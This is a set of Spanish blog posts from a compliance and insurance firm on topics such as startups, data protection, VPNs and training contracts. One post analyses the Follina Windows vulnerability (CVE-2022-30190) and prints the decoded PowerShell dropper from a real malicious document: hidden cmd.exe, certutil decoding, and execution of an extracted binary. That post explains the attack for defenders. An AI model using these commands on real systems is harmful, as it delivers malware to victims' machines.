STARTUPS, QUE SON Y CUÁLES SON SUS CARACTERÍSTICAS

STARTUPS, ¿QUÉ SON? Y CUÁLES SON SUS CARACTERÍSTICAS

La palabra startup, es un concepto inglés, que lo que quiere decir es: “empresa de nueva creación, en etapa más temprana o empresa emergente”. Este modelo de negocio, gracias al empleo de nuevas tecnologías, tiene más posibilidad de escalar o crecer de forma más rápida.

Esta modalidad puede crear confusión con las pymes, debido a sus recursos humanos y volumen de negocio, en cambio no son lo mismo. Entre las principales características de una startups y que las diferencias de una pyme son:

  • La Juventud, al ser una entidad emergente, no cuenta con un amplio recorrido y un posicionamiento previo, por lo que no tiene que definirse como pyme.
  • Innovación, las empresas emergentes van asociadas de la mano de las tecnologías, por lo que es una de sus principales ventajas competitivas, en cambio las pymes pueden contar con tecnología punta, pero no basan su modelo de negocio en la innovación.
  • Alcance, las pymes tradicionales suelen tener un alcance al mercado local o nacional, aunque no tiene porque, en cambio el starups tienen un enfoque más amplio, enfocadas al ámbito global.
  • Estabilidad, esta modalidad persigue aumentar su magnitud e ingresos a corto plazo, sin que conlleve un coste elevado, en cambio las pymes tienen una trayectoria más lineal, por lo que suele tener un índice mayor de supervivencia.
  • Costes bajos, para el desarrollo y puesta en marcha de la actividad de una empresa emergente no requiere un coste alto, gracias a esto y otros factores, crecen de forma rápida e incrementan su margen de beneficio.
  • Financiación, en el caso de las pymes el capital externo es mínimo incluso inexistente, en cambio las startups priorizan las inversiones de terceros

Si desea obtener más información al respecto, no dude en ponerse en contacto con nosotros a través del formulario web de contacto de nuestra web www.grupodata.es.

 

Publicado el 29 de Julio de 2022
Por Alfredo Barroso
Responsable de LSSICE y Comercio Electrónico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

PROTECCIÓN DE DATOS EN VACACIONES

PROTECCIÓN DE DATOS EN VACACIONES

Desde GRUPO DATA, con motivo de nuestro compromiso de concienciación y fomento de la protección de datos, os indicamos una serie de consejos, publicados por la Agencia Española de Protección de Datos, para que estas vacaciones la única preocupación sea descansar y disfrutar. 

Mediante este artículo en el blog, la Agencia Española de Protección de Datos, ha puesto de manifiesto una serie de recomendaciones, para saber cómo afrontar situaciones de riesgo para la protección de nuestros datos personales.

 

Piensa dos veces antes de compartir una foto o vídeo

La actividad estival hace que la cámara de nuestro teléfono móvil tenga más trabajo del habitual: detalles de los lugares que hemos visitado, gente con la que hemos estado, fiestas a las que hemos asistido, etc. Compartir parte de esas fotografías (o todas) en una red social es algo habitual para algunas personas y entraña algunos riesgos.

Según datos del Centro de Investigaciones Sociológicas (CIS), una de cada cuatro personas (24.5%) se ha arrepentido alguna vez de haber colgado algo en una red social. Te recomendamos que pienses en quién podrá ver tus fotos antes de pulsar el botón de compartir en tus redes sociales. Si tu perfil es accesible para los buscadores, ten en cuenta que cualquiera podrá ver, por ejemplo, las fotos, vídeos o comentarios que publicas. La Agencia dispone de una serie de vídeo tutoriales explicativos elaborados junto a INCIBE en  los que explica cómo acceder a la configuración de privacidad y seguridad de algunos de los servicios más populares en Internet para que tu perfil no se muestre cuando, por ejemplo, introduzcan tu nombre en un buscador.

Una vez que tu perfil ya no sea accesible para los buscadores, piensa también en que las personas a las que das acceso a tu información eligen a su vez quien puede tener acceso a su perfil: amigos, amigos de amigos o todo el mundo. Si compartes una foto con tus seguidores o amigos en una red social y uno de ellos indica que algo le gusta, un amigo de amigo, al que no tienes por qué conocer, puede terminar viendo esa imagen. Y es posible que haya situaciones que quizás no quieres compartir con desconocidos.

Siguiendo con los datos del CIS, un 12.2% de los encuestados afirma haber tenido problemas por contenidos que otros han colgado en una red social. Debemos recordar que necesitamos consentimiento de las personas que aparecen en las fotos que tomamos antes de compartirlas en Internet o de sus padres o tutores en el caso en que aparezcan menores.

 

Evita decir dónde estás

Compartir en Internet fotografías de tus viajes o tu geolocalización a través de una aplicación puede dar información a los delincuentes para saber cuándo no estás en casa. Ten cuidado también con compartir imágenes de tus billetes o tarjetas de embarque, ya que sus códigos pueden ser utilizados para acceder a tus datos personales y conocer el destino y fechas de tu viaje.

 

Desconfía de las WiFis abiertas y ordenadores compartidos

En verano pasamos mucho tiempo lejos de la WiFi de nuestra casa o del trabajo. Esto hace que consumamos los datos contratados rápidamente y andemos a la caza de WiFi gratuito. Las redes abiertas en ocasiones pueden ser utilizadas por ciberdelincuentes para robarte tus datos personales y contraseñas. Si las utilizas, no introduzcas tus contraseñas, no intercambies información sensible, no te conectes a tu servicio de banca, y no compres por Internet con ellas.

Del mismo modo, cuando estamos de viaje, pueden surgir situaciones en las que nos vemos obligados a hacer un trámite y conectarnos desde un ordenador público de un hotel o un locutorio. En estos casos te recomendamos utilizar la opción de navegación privada del navegador, no guardar tus contraseñas en el dispositivo compartido y, después de utilizarlo, cerrar todas las sesiones que hayas abierto (correo electrónico, webs, chats, etcétera).

 

Adelántate al robo o pérdida de tus dispositivos

Cuando viajas o realizas actividades veraniegas como ir a la piscina, la playa o visitar lugares turísticos, aumentan los riesgos de perder o que nos roben nuestro móvil o tableta. No solemos ser conscientes de la cantidad de datos e información personal que contienen. Te recomendamos que hagas una copia de seguridad de la información que almacenas y no olvides añadir un sistema de clave o patrón para bloquear los dispositivos. 

 

Publicado el 29 de Julio de 2022
Por María González
Responsable del Departamento Jurídico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

SI ERES INFLUENCER, ESTO TE INTERESA

SI ERES INFLUENCER, ESTO TE INTERESA

Estar expuesto ante miles de seguidores conlleva una serie de riesgos de los que no todos son conscientes. Obtener permiso del autor antes de publicar una foto en Instagram o verificar las regulaciones más recientes sobre la divulgación de publicaciones en las redes sociales puede carecer de importancia para muchos, pero ambos escenarios son ejemplos muy reales de los riesgos emergentes que enfrentan las personas de alto perfil.  La mejor manera de eliminar el riesgo es contratando una póliza de seguro.

 

Ya tenemos disponible el primer seguro específico para influencer:

 

¿A quién va dirigido?

  • Eres una persona que destaca en una red social expresando sus opiniones o ejerces influencia sobre otros en temas específicos.
  • Eres una persona que ha firmado un acuerdo de patrocinio con una marca para promocionar productos o servicios en tu canal o perfil público.
  • Monetizas tu canal de YouTube, Twitch u otras redes sociales.
  • Tienes suficientes seguidores comprometidos que confían en tu opinión y en la información que transmites, y lo que dices y haces se convierte habitualmente en tendencia.

 

Este producto tiene dos coberturas principales.

  1. Responsabilidad Civil Profesional (obligación que tiene una persona de pagar o reparar cualquier daño, pérdida o menoscabo causados a una tercera persona por culpa de una negligencia profesional).
  2. Ciberseguridad (No solo responde en caso de sufrir un ciberataque, sino que también te ofrece medidas que te ayudarán a prevenir que este tipo de siniestro ocurra. Así pues, es necesario que: Te proteja ante denuncias de terceras personas que, a causa del ataque, también puedan verse afectadas).

Este seguro de Influencers también ofrece servicios de asesoría para acompañar y guiar al influencer en caso de demanda por parte de un tercero. Gastos de representación legal, asesoramiento jurídico e incluso asesoría en relaciones públicas en caso de una crisis reputacional, convirtiéndose en un servicio atractivo, ya que no cubre únicamente las consecuencias económicas, sino que abordaría los siniestros de forma integral, buscando la recuperación temprana del influencer y que su actividad se vea lo menos afectada posible.

Si quiere un asesoramiento personalizado, póngase en contacto con nosotros a través de este enlace o llame al 927 600 000.

 

Publicado el 29 de Julio de 2022
Por Luis Fernando Gallego
Departamento de Seguros

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿QUÉ GESTIONES DEBES REALIZAR PARA TRAMITAR UN CONTRATO DE FORMACIÓN EN ALTERNANCIA?

¿QUÉ GESTIONES DEBES REALIZAR PARA TRAMITAR UN CONTRATO DE FORMACIÓN EN ALTERNANCIA?

Según la nota informativa publicada por el SEPE y DGT, desde el 30 de marzo de 2022 ya no es necesario solicitar la autorización previa de la formación ante el Servicio Público de Empleo competente.

 

 

El primer paso para poder comenzar a gestionar el contrato en formación, es cumplimentar y remitirnos la ficha de inscripción, que figura en nuestra página web, con todos los datos necesarios.

Una vez recibidos los datos, te facilitaremos el plan formativo individual para la persona trabajadora y el Acuerdo para la Actividad Formativa del Contrato de Formación en Alternancia, Anexo que debe incluirse obligatoriamente en el contrato y ser firmado por empresa, trabajador/a y nuestro centro de formación.

Importante: no debes realizar el alta sin antes tener diseñado tu plan de formación individual.

Tras tener la documentación facilitada por su centro de formación, podrá realizar el alta, a continuación, veremos las características propias del alta en esta modalidad contractual:

Gestiones en la Tesorería General de la Seguridad Social para dar de alta el contrato de formación.

  1. Presenta el parte de alta (modelo TA-2) del trabajador, con carácter previo al inicio del contrato (TA-1, si el trabajador no tiene número de afiliación).
  2. Realiza el alta en Afiliaciones de Sistema RED, en la opción de «Altas sucesivas y bajas», escoge la opción alta. Desde hace unos años las cuentas de cotización se han unificado (C.C.C.) y esto afecta al proceso de afiliación:
    • En el supuesto de que sea el primer contrato de formación que realiza la empresa:

Para que se puedan aplicar las condiciones de cotización del contrato de formación tendrás que incluir en la casilla «Exc.Cotización» el código 087. Tendrás que solicitar a Seguridad Social que te lo habiliten antes a través de CASIA.

Obtener respuesta de CASIA, puede hasta un día. Es recomendable solicitar este trámite con antelación previa, con el fin de evitar repetir el trámite de alta.

    • Si, por el contrario, la empresa ha tenido anteriormente otros contratos de formación en meses anteriores, no será necesario que realices este trámite, tan solo debes recordar seleccionar el código 087 en «Exc. Cotización».

Además, te indicamos las casillas que debes marcar para el alta del contrato de formación y qué códigos incluir:

  1. En situación del alta: 01.
  2. Grupo de cotización: 10.
  3. Casilla de Exclusiones de Cotización: 087.
  4. Tipo de contrato: 421 para jornada completa / 521, si es jornada parcial.
  5. Casilla Cond. Desempleado, con el valor 1. En el supuesto de no marcar este valor, el sistema no aplicará la bonificación de los seguros sociales.
  6. Casilla Beneficios, con el valor 01. Para trabajadores inscritos en Garantía Juvenil.

A continuación, podrás ver un ejemplo de tramitación del alta del contrato de formación en Sistema RED:

En relación al trámite con el Servicio Público de Empleo Estatal.

  1. Realiza el alta del contrato de trabajo para la formación y el aprendizaje. Modelo con código 421/521.
  2. Deberás indicar si el contrato se realiza a jornada completa o parcial y si tiene derecho a reducción o bonificación.
    • Recuerda marcar Reducción de la cuota, demandante de empleo.
  3. Adjunta el Anexo I, Acuerdo para la Actividad Formativa. En caso de no poder añadir el documento en Contrat@, aconsejamos que lo remitas al Servicio Público de Empleo competente a través de Registro, lo podrás realizar, bien mediante el aplicativo RedSara o en la oficina de registro más cercana.

En conclusión, antes de tramitar un Contrato de Formación en Alternancia, deberás contactar con un centro de formación acreditado. Desde Grupo Data, para poder prestarte un asesoramiento adecuado, en la contratación, revisaremos que requisitos se cumplen para realizar un contrato de formación en alternancia, analizando tanto el perfil de la empresa, de persona trabajadora, como el puesto a desempeñar. No solo eso, además de guiarle en la contratación, elaboraremos la documentación necesaria para realizar dicha contratación.

 

Publicado el 29 de Julio de 2022
Por Néftaly Blanco
Responsable de Contratos de Formación

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VPN

VPN

¿Qué es una VPN?

Una VPN (Virtual Private Network, en inglés) es una herramienta que establece una conexión de red segura cuando navegamos por internet. La VPN encripta todo nuestro tráfico que viaja a través de internet haciendo más difícil que un tercer actor robe nuestra información o rastree nuestra actividad.

 

¿Cómo funciona?

Cuando establecemos una conexión VPN lo que hacemos es realizar una conexión remota con el servidor de la VPN. Para ello, primero, nos autentificamos y el servidor utiliza una serie de protocolos para cifrar nuestros datos. Desde este instante todos los paquetes que enviamos irán cifrados en otro paquete externo mediante un proceso de encapsulación. Cuando los paquetes llegan a la VPN, esta elimina el paquete externo mediante un proceso de descifrado para acceder a los datos que contiene.

A partir de este momento el servidor remoto de la VPN se convierte en el origen de nuestros datos enviando nuestras peticiones. Cuando el servidor web responde a nuestra petición la VPN se encarga de cifrar los datos y enviárnoslo de nuevo.

 

Tipos de VPN

Los tipos de VPN que nos podemos encontrar son:

  • VPNs de acceso remoto: son utilizadas por las empresas para establecer una conexión segura entre los recursos de la empresa y los dispositivos personales o de la compañía de los empleados. Una vez conectado los empleados pueden acceder a la información de la empresa sin tener que estar físicamente dentro de la red empresarial.
  • VPNs punto a punto: ideales para grandes compañías que desean compartir información entre distintos usuarios situados en localizaciones diferentes. Pueden existir a su vez dos subtipos.
    • Intranet punto a punto: son útiles cuanto una empresa tiene oficinas en distintas localizaciones y se desean compartir información entre ambas.
    • Extranet punto a punto: similar a la anterior pero esta vez cuando se desean conectar intranets entre empresas distintas.
  • Basadas en clientes: permiten al usuario conectarse a una red remota mediante una aplicación web. Por seguridad esta aplicación usa un método de autenticación. Útiles cuando se desea trabajar desde una red pública.

 

Beneficios de usar una VPN

Algunos de los beneficios más destacados que puede aportar el uso de una VPN son:

  • Encriptación Segura: toda la información que mandamos a través de la VPN es encriptada. Para poder desencriptarla se necesita una clave. Sin la clave no nos pueden robar la información ya que mediante ataques de fuerza bruta llevaría millones de años desencriptar la información.
  • Ocultar nuestra localización: en una VPN el servidor actúa como un proxy a internet. Dado que este servidor puede encontrarse en una localización distinta a la nuestra y este actúa como origen de los datos es imposible determinar a ciencia cierta nuestra localización.
  • Saltarse restricciones geográficas: determinado contenido en internet es solo accesible para ciertas partes del mundo. Mediante VPN spoofing podríamos cambiarnos a un servidor ubicado en otra localización para poder acceder a ese contenido.

 

 

Publicado el 29 de Julio de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

CURSOS OBLIGATORIOS POR SECTORES

CURSOS OBLIGATORIOS POR SECTORES

 

Todas las empresas tienen la obligación de formar a sus trabajadores en el momento de la contratación independientemente de la duración del contrato.

Dependiendo de la actividad de la empresa, existen una serie de cursos obligatorios para el desempeño laboral de los trabajadores y evitar graves sanciones.

A continuación, indicamos los cursos a realizar en función de la actividad de la entidad. Dichos cursos se pueden realizar mediante formación bonificada no suponiendo coste para la empresa.

Todas las empresas.

Agentes de seguros, abogados, procuradores, joyeros, loteros, inmobiliarias, promotores.

  • Prevención de blanqueo de capitales

Guarderías, colegios, etc.

  • Manipulador de alimentos de alto riesgo.
  • Control de alérgenos e intolerancias alimentarias.

Geriátricos.

Construcción, metal, madera.

  • Plataformas elevadoras.

Hostelería.

Hoteles.

Ambulancias.

  • RCP básica y primeros auxilios
  • Soporte vital básico

Grupo Data como entidad acreditada por el por el Servicio Público de Empleo Estatal y Organizadora de la Fundación Estatal para el Empleo con nº de Expediente B220076AE, nos encargamos de toda la gestión para la realización de cursos de formación bonificada.

 

Publicado el 29 de Julio de 2022
Por Raquel Costa
Responsable de Formación Bonificada

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

ASESORA Y ASESOR CONFIDENCIAL

ASESORA Y ASESOR CONFIDENCIAL

Las empresas están obligadas a promover las condiciones de trabajo que eviten el acoso sexual y el acoso por razón de sexo, así como a arbitrar procedimientos específicos para su prevención y para dar cauce a las denuncias o reclamaciones que puedan formular quienes hayan sido objeto del mismo, de conformidad con lo establecido en el artículo 48 de la Ley Orgánica 3/2007, de 22 de marzo, para la igualdad efectiva de mujeres y hombres. 

La figura de la asesoría confidencial va implícita en todo protocolo de acoso. En este sentido, se designará a una o varias personas como asesoras o asesores confidenciales para dar cauce a las denuncias y reclamaciones que realicen quienes sean objeto de este tipo de acoso dentro de la empresa, en definitiva, será la persona encargada de la gestión y seguimiento de las denuncias.

La gestión de las denuncias debe realizarse de forma ágil, cuanto más detallada sea la denuncia más rápido concluirá la fase de investigación.

Una vez recibe el asesor/a confidencial la denuncia o reclamación, inicia una primera comprobación de los datos contenidos en la denuncia, tras lo cual realiza una investigación en detalle de los hechos acontecidos para, finalmente constatar si se está o no ante un caso de acoso sexual o por razón de género.

Durante la fase de investigación el asesor o asesora confidencial podrán establecer las medidas cautelares que a su criterio estimen necesarias para evitar el contacto entre denunciante y supuesto acosador/a hasta que se resuelva la situación. Es importante que la fase de investigación se lleve a cabo con tacto y cautela para las dos partes implicadas: denunciante y denunciada/o. Asimismo, se garantiza durante todo el procedimiento de investigación la confidencialidad y se protege la identidad de las personas que participan en las investigaciones.

El resultado de la investigación del asesor confidencial se plasma en un informe que contendrá las conclusiones a las que ha llegado, así como detallará las diligencias y actuaciones que ha realizado para obtener las pruebas. Este informe se emitirá a la dirección de la entidad para que lleve a cabo las acciones preventivas o disciplinarias razonadas en el mismo.

Si en el informe se concluye que se ha producido un hecho de acoso sexual o por razón de sexo, la dirección de la empresa debe adoptar las medidas correctoras que estime, atendiendo a las recomendaciones realizadas por el asesor confidencial, o bien, aquellas medidas comprendidas en el Régimen disciplinario previsto en el Convenio Colectivo de aplicación.

Puede que el resultado de la investigación esclarezca que no se ha producido un hecho de acoso sexual o por razón de sexo y en este caso únicamente se archiva el expediente, cuestión distinta será que se trate de una denuncia falsa ya que en este caso también se aplicarán sanciones.

La asesora o asesor confidencial debe ser una persona con formación en la materia para afrontar estas situaciones y velar porque durante todo el proceso de cumplan con garantías como la confidencialidad, de ahí, que también tenga un papel importante en materia de prevención de situaciones de acoso sexual y por razón de sexo, y no sólo se encargue de la tramitación y gestión de las denuncias.

 

 

Publicado el 29 de Julio de 2022
Por Judith Lorenzo
Departamento Jurídico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS (CVE-2022-30190 «FOLLINA»)

Nota 17/06/2022: Microsoft ya ha subido un parche para la vulnerabilidad CVE-2022-30190 “Follina” dentro de la actualización de Junio de Windows, Se recomienda actualizar los equipos cuanto antes.

En los últimos días de mayo de 2022, la comunidad de ciberseguridad ha hecho eco de una nueva vulnerabilidad que afecta al sistema operativo Windows y el paquete de ofimática Microsoft Office. Esta nueva vulnerabilidad CVE-2022-30190, bautizada como “Follina” es capaz de ejecutar código arbitrario en las últimas versiones de Windows y Office con solo un click o incluso con 0 clicks.

Todo empezó por un Tweet del grupo de investigación en Ciberseguridad nao_sec. Este grupo japonés estaba analizando un documento infectado que había sido subido en el portal VirusTotal (Un servicio gratuito que analiza archivos y URLs en busca de malware).

Como dice el tweet, dentro del documento .doc hay una referencia a un link externo a una URL que carga un archivo HTML y este es capaz de ejecutar código arbitrario en PowerShell.

El documento hace uso de una utilidad en Word que carga una plantilla en remoto y lo muestra en el documento. Esta utilidad lo que hace es cargar un archivo HTML que define la plantilla del documento alojado en un servidor remoto.

El actor hace una referencia a una URL donde tiene alojado un archivo HTML donde podemos destacar dos cosas:

  • Hay un bloque de comentarios donde hay un montón de “A”s, aún no se sabe a ciencia cierta por qué es necesario pero esta entrada del blog de Bill Demirkapi indica que hay un Buffer de un tamaño fijo en una función que procesa el HTML, por lo que si el archivo es menor que 4096 bytes, no es capaz de iniciar el payload. Estas “A”s funcionan como relleno para que el archivo pase ese límite.
  • Vemos que dentro del HTML, hay una referencia a una URI con un esquema que hace referencia al protocolo ms-msdt utilizado por el sistema operativo para ejecutar el solucionador de problemas de windows.

(Nota: en vez de poner http:// o https:// como en las URIs que todos conocemos, en esta URI contiene ms-msdt:/).

El esquema ms-msdt hace referencia al paquete PCWDiagnostics, más conocido como el “Solucionador de problemas” de Windows que se suele utilizar cuando no funciona el sonido o el WiFi..

Esa URI lanza el programa con una serie de parámetros. En uno de los parámetros vemos que usa sintaxis de PowerShell, donde se encuentra el payload codificado en Base64. Si lo decodificamos podemos ver lo que contiene:

$cmd = «c:\windows\system32\cmd.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c taskkill /f /im msdt.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c cd C:\users\public\&&for /r %temp%
%i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil –
decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe»
;

Estos comandos hacen lo siguiente:

  • Abre una ventana oculta de cmd.exe.
    • Mata al proceso msdt.exe.
    • Hace un bucle de los archivos que se encuentra dentro de un archivo .rar buscando una cadena en Base64 que codifica un archivo CAB.
      • Guarda el archivo CAB codificado en Base64 como 1.t.
      • Decodifica el archivo CAB codificado en Base64 y lo guarda como 1.c.
      • Descomprime el archivo CAB 1.c en el directorio.
      • Y por último ejecuta rgb.exe que seguramente se encontraría dentro del archivo CAB.

(Nota: un archivo CAB (.cab) se refiere a un archivo Windows Cabinet cuyo contenido tiene datos comprimidos, parecido a los ZIP. en este caso el archivo CAB tenía dentro un archivo ejecutable llamado rgb.exe).

En resumen, un documento aparentemente inofensivo sería capaz de ejecutar código arbitrario en el equipo de la víctima, aunque éste lo vea en vista protegida. Y para empeorar las cosas, si en vez de un archivo de word .doc se trata de un archivo de Formato de Texto Enriquecido .rtf simplemente con ver en archivo dentro del explorador de Windows es capaz de ejecutar código arbitrario sin ningún click.

En esta prueba de concepto publicada por Benjamin Delpy podemos ver cómo es explotada esta vulnerabilidad. Nada más abrir el archivo .doc con las últimas versiones de Windows y Microsoft Office, podemos ver cómo se abre la ventana del solucionador de problemas y cómo después aparece la calculadora de Windows que ha sido lanzada por el payload.

Aún sin parche publicado por la gente de Microsoft, la únicas formas de mitigar este ataque es deshabilitar el protocolo MSDT como indican en esta publicación de Microsoft..

 

 

Esta vulnerabilidad ya catalogada como 0day afecta a las últimas versiones de Office y de Windows, por lo que en estos días se esperan una oleada de ataques por correo electrónico y otros medios utilizando estas técnicas, por lo que hay que tomar aún más precauciones con los mensajes que recibimos.

Referencias:

 

 

 

Publicado el 24 de Junio de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿UTILIZAN LAS EMPRESAS EL CRÉDITO FORMATIVO?

¿UTILIZAN LAS EMPRESAS EL CRÉDITO FORMATIVO?

 

La formación es un pilar fundamental para las empresas, ayuda a mejorar la competitividad, así como a incrementar la productividad y empleabilidad ofreciendo un valor añadido a la empresa.

La Formación Bonificada es un crédito concedido a las empresas para que proporcionen a sus empleados acciones formativas relacionas con el puesto de trabajo con el objetivo de aumentar la cualificación profesional e incrementar su el rendimiento en el puesto de trabajo, mejorando sus competencias profesionales.

La principal característica de la formación bonificada es que es totalmente gratuita para los trabajadores y además no supone coste para la empresa, ya que se puede bonificar hasta el 100% del importe de la formación en las cuotas de la Seguridad Social.

La mayoría de las entidades desconocen la posibilidad de aprovecharse de este recurso para formar a sus trabajadores.

Según los datos analizados por la Encuesta Anual Laboral sobre formación programada elaborada por el Ministerio de Trabajo, influyen otros factores por los que las empresas no forman a sus trabajadores como:

  • El nivel de formación de sus empleados es adecuado.
  • Los trabajadores no disponen de tiempo debido a la elevada carga de trabajo.
  • Las empresas contratan personal ya cualificado con las competencias necesarias a desarrollar en el puesto de trabajo.

También, influyen otros factores relacionados con el coste, la falta de cursos adecuados y las dificultades de acceso a ayudas o subvenciones.

Las empresas que forman a sus trabajadores mediante la formación bonificada demandan acciones formativas relacionadas con dirección, trabajo en equipo, atención al público o trato con clientes, administrativas de oficina.

Grupo Data como entidad acreditada por el por el Servicio Público de Empleo Estatal y Organizadora de la Fundación Estatal para el Empleo con nº de Expediente B220076AE, nos encargamos de toda la gestión para la realización de cursos de formación bonificada.

 

Publicado el 24 de Junio de 2022
Por Raquel Costa
Responsable de Formación Bonificada

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿EL FIN DE LAS RESEÑAS FALSAS O FAKE REVIEWS?

¿EL FIN DE LAS RESEÑAS FALSAS O FAKE REVIEWS?

Uno de los puntos clave para un ecommerce son las reseñas o comentarios de los productos/servicios ofrecidos a través de la web. La contratación de lo vendido en una web puede verse directamente afectada por un comentario que un cliente haya hecho sobre el bien o producto contratado. Este medio no solo ha sido utilizado para que los usuarios cuenten sus experiencias reales si no que se ha empleado, por parte del titular web, para crear falsas reseñas de clientes satisfechos o incluso, la competencia los utiliza para atacar al titular web.

El 28 de mayo entró en vigor la modificación de la Ley General para Defensa de los Consumidores y la Ley de Competencia Desleal  estableciendo:

“Las prácticas comerciales en las que un empresario facilite el acceso a las reseñas de los consumidores y usuarios sobre bienes y servicios deberán contener información sobre el hecho de que el empresario garantice o no que dichas reseñas publicadas han sido efectuadas por consumidores y usuarios que han utilizado o adquirido realmente el bien o servicio.

Se aplicarán sanciones para aquellos titulares web que afirmen que las reseñas de un determinado bien o servicio son realizadas por consumidores y usuarios que no hayan utilizado o adquirido realmente el bien o servicio. Además, también se pretende sancionar a las entidades que encarguen incluir reseñas falsas, o comentarios que distorsionen las reseñas de consumidores o usuarios reales, con el fin de disminuir las contrataciones y promocionar sus bienes o servicios.

También se incluye un apartado para penalizar las prácticas engañosas, en las que se realicen reseñas sin que se hayan tomado las medidas razonables y proporcionadas, por parte del responsable de la web, para garantizar que dichas reseñas pertenecen a dichos consumidores o usuarios reales.

Para evitar este tipo de conducta desleal, el Ministerio de Consumo es el organismo legitimado para controlar que las entidades que dispongan de una web cumplan con lo establecido en la normativa y de sancionar a las entidades por la práctica de esta conducta.

La Organización de Consumidores y Usuarios (OCU) establece que «Las sanciones podrían llegar al millón de euros (muy graves); o de hasta ocho veces el beneficio que se haya obtenido de forma ilícita cuando la infracción se comete en nuestro país, y de hasta el 4% del volumen de facturación cuando se cometan infracciones en varios países de la Unión Europea”.

La OCU da seis consejos para poder detectar las reseñas falsas que se realicen en un sitio web.

  1. Comprobar que la reseña de un producto tenga comentarios decompra verificada. De no ser así, no se tiene la certeza de que quién está opinando ha adquirido o contratado el producto.
  2. Las opiniones incluyen, de forma excesiva, muchas fotos, incluso vídeos. No es razonable que un producto cuente con muchos usuarios tan satisfechos como para dedicarle tanto esfuerzo a promocionarlo.
  3. Las opiniones más positivas son las más antiguas. Al ordenar los comentarios por fecha se puede ver si las más benevolentes coinciden en unas determinadas fechas.
  4. El gráfico de valoraciones para ese producto o servicio tiene forma de C, es decir, hay muchísimas buenas valoraciones (5 estrellas), pero también bastantes muy malas (1 estrella).
  5. Quienes opinan sobre ese producto o servicio lo hacen mucho y siempre en positivo.
  6. Comentarios vagos e inconcretos, que no aportan detalles de la experiencia.

 

Publicado el 24 de Junio de 2022
Por Alfredo Barroso
Responsable de LSSICE y Comercio Electrónico

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.